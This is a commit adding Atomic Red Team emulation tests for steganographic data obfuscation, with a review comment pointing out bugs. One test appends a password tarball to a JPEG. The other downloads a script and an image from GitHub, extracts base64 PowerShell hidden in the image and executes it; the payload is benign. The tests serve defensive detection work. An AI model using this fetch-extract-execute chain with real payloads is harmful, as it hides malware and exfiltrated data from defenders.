New Tests: T1001.002 - Data Obfuscation: Steganography (#2695)

* Create T1001.002.yaml

* Create T1001.002.md

* Update T1001.002.yaml

* Update T1001.002.yaml

* Delete atomics/T1001.002/T1001.002.md

---------

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
Raghav_Singh
2024-03-07 03:42:19 +11:00
committed by GitHub
parent 029110b694
commit 097ed862cc
@@ -0,0 +1,148 @@
attack_technique: T1001.002
display_name: "Data Obfuscation via Steganography"
atomic_tests:
- name: Steganographic Tarball Embedding
auto_generated_guid: c7921449-8b62-4c4d-8a83-d9281ac0190b
description: |
This atomic test, named "Steganographic Tarball Embedding", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball)
within an image.
The test begins by ensuring the availability of the image file and the tarball file containing data . It then generates random passwords and saves them to a
file. Subsequently, the tarball file is created, containing the passwords file. The test executor command reads the contents of the image
file and the tarball file as byte arrays and appends them together to form a new image file. This process effectively embeds the tarball
file within the image, utilizing steganography techniques for data obfuscation.
This atomic test simulates the technique of data obfuscation via steganography, enabling attackers to clandestinely transfer files across systems undetected.
By embedding the tarball file within the image, adversaries can obscure their activities, facilitating covert communication and data exfiltration.
supported_platforms:
- windows
input_arguments:
image_file:
description: Image file which will be downloaded to be used to hide data
type: path
default: PathToAtomicsFolder\T1001.002\bin\T1001.002.jpg
tar_file:
description: Tarz file containing random passwords
type: path
default: $env:PUBLIC\Downloads\T1001.002.tarz
new_image_file:
description: new image file ready for extraction
type: path
default: $env:PUBLIC\Downloads\T1001.002New.jpg
passwords_file:
description: Text file containing random passwords
type: path
default: $env:TEMP\random_passwords.txt
dependency_executor_name: powershell
dependencies:
- description: |
Image file must exist
prereq_command: |
if (!(Test-Path "#{image_file}")) {exit 1} else {
{exit 0}
}
get_prereq_command: |
New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null
Write-Output "Downloading image file..."
$imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg"
Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}"
- description: |
File to hide within tarz file must exist
prereq_command: |
if (!(Test-Path "#{passwords_file}")) {exit 1} else {
{exit 0}
}
get_prereq_command: |
Write-Output "Generating random passwords and saving to file..."
$passwords = 1..10 | ForEach-Object { Get-Random -InputObject ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?') -Count 12 }
$passwords | Out-File -FilePath "#{passwords_file}"
- description: |
Tarz file to embed in image must exist
prereq_command: |
if (!(Test-Path "#{tar_file}")) {exit 1} else {
{exit 0}
}
get_prereq_command: |
Write-Output "Generating tarz file..."
tar -cvf "#{tar_file}" "#{passwords_file}"
executor:
name: powershell
elevation_required: true
command: |
Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount 0 | Set-Content "#{new_image_file}" -Encoding byte
cleanup_command: |
Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore
- name: Embedded Script in Image Execution via Extract-Invoke-PSImage
auto_generated_guid: 04bb8e3d-1670-46ab-a3f1-5cee64da29b6
description: |
This atomic test demonstrates the technique of data obfuscation via steganography, where a PowerShell script is concealed within an image file.
The PowerShell script is embedded using steganography techniques, making it undetectable by traditional security measures. The script is hidden
within the pixels of the image, enabling attackers to covertly transfer and execute malicious code across systems.
The test begins by ensuring the availability of the malicious image file and the Extract-Invoke-PSImage script. The test proceeds to extract the hidden
PowerShell script (decoded.ps1) from the image file using the Extract-Invoke-PSImage tool. The extracted script is then decoded from base64 encoding and saved as a
separate PowerShell (textExtraction.ps1). Consequently, the textExtraction.ps1 script is executed.
In the case of this atomic test, the malicious image file which is downloaded has the powershell command Start-Process notepad embedded within in base64. This
is done to emulate an attackers behaviour in the case they were to execute malware embedded within the image file.
supported_platforms:
- windows
input_arguments:
image_file:
description: Malicious Image file which will be downloaded
type: path
default: PathToAtomicsFolder\T1001.002\bin\evil_kitten.jpg
psimage_script:
description: Extract-Invoke-PSImage Script downloaded
type: path
default: PathToAtomicsFolder\ExternalPayloads\Extract-Invoke-PSImage.ps1
dependency_executor_name: powershell
dependencies:
- description: |
Image file must exist
prereq_command: |
if (!(Test-Path "#{image_file}")) {exit 1} else {
{exit 0}
}
get_prereq_command: |
New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null
Write-Output "Downloading image file..."
$imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg"
Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}
- description: |
Extract-Invoke-PSImage must exist
prereq_command: |
if (!(Test-Path "#{psimage_script}")) {exit 1} else {
{exit 0}
}
get_prereq_command: |
New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null
Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..."
$scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165d2f9bfe9c3965181079b7c82e03168ce1/Extract-Invoke-PSImage.ps1"
Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script}
executor:
name: powershell
elevation_required: true
command: |
cd "PathToAtomicsFolder\ExternalPayloads\"
Import-Module .\Extract-Invoke-PSImage.ps1
$extractedScript=Extract-Invoke-PSImage -Image "#{image_file}" -Out "$HOME\result.ps1"
$scriptContent = Get-Content "$HOME\result.ps1" -Raw
$base64Pattern = "(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])"
$base64Strings = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value }
$base64Strings | Set-Content "$HOME\decoded.ps1"
$decodedContent = Get-Content "$HOME\decoded.ps1" -Raw
$decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent))
$textPattern = '^.+'
$textMatches = [regex]::Matches($decodedText, $textPattern) | ForEach-Object { $_.Value }
$scriptPath = "$HOME\textExtraction.ps1"
$textMatches -join '' | Set-Content -Path $scriptPath
. "$HOME\textExtraction.ps1"
cleanup_command: |
Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
Remove-Item -Path "$HOME\result.ps1" -Force -ErrorAction Ignore
Remove-Item -Path "$HOME\textExtraction.ps1" -Force -ErrorAction Ignore
Remove-Item -Path "$HOME\decoded.ps1" -Force -ErrorAction Ignore
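Review bot: the password generator in the passwords_file get_prereq_command, `Get-Random -InputObject ('ABCDEF...') -Count 12`, hands Get-Random a single string object, so each of the ten lines written to random_passwords.txt is the whole character set rather than a 12-character password; pass the characters instead and join them, e.g. `-join (Get-Random -InputObject ('ABCDEF...').ToCharArray() -Count 12)`. Smaller points in the same hunk: every prereq_command uses `else { {exit 0} }`, where the inner braces make a script-block literal that is emitted to the pipeline rather than run (the check still exits 0, but `else { exit 0 }` is what is meant); `Get-Content ... -Encoding byte | Set-Content ... -Encoding byte` in the first executor only works in Windows PowerShell 5.1, since PowerShell 7 removed `-Encoding Byte` in favour of `-AsByteStream`, so either state the version requirement or branch on `$PSVersionTable`; `-OutFile #{image_file}` and `-OutFile #{psimage_script}` in the second test are unquoted, unlike the equivalent `-OutFile "#{image_file}"` in the first, and will break on paths containing spaces; the second executor hardcodes `cd "PathToAtomicsFolder\ExternalPayloads\"` and `Import-Module .\Extract-Invoke-PSImage.ps1` instead of using the `#{psimage_script}` argument it defines, and `$extractedScript` is assigned but never read; `elevation_required: true` is set on both tests although nothing in either command needs administrator rights; and "Tarz file" in the tar_file description should read "Tar file", as the archive is produced with plain `tar -cvf`.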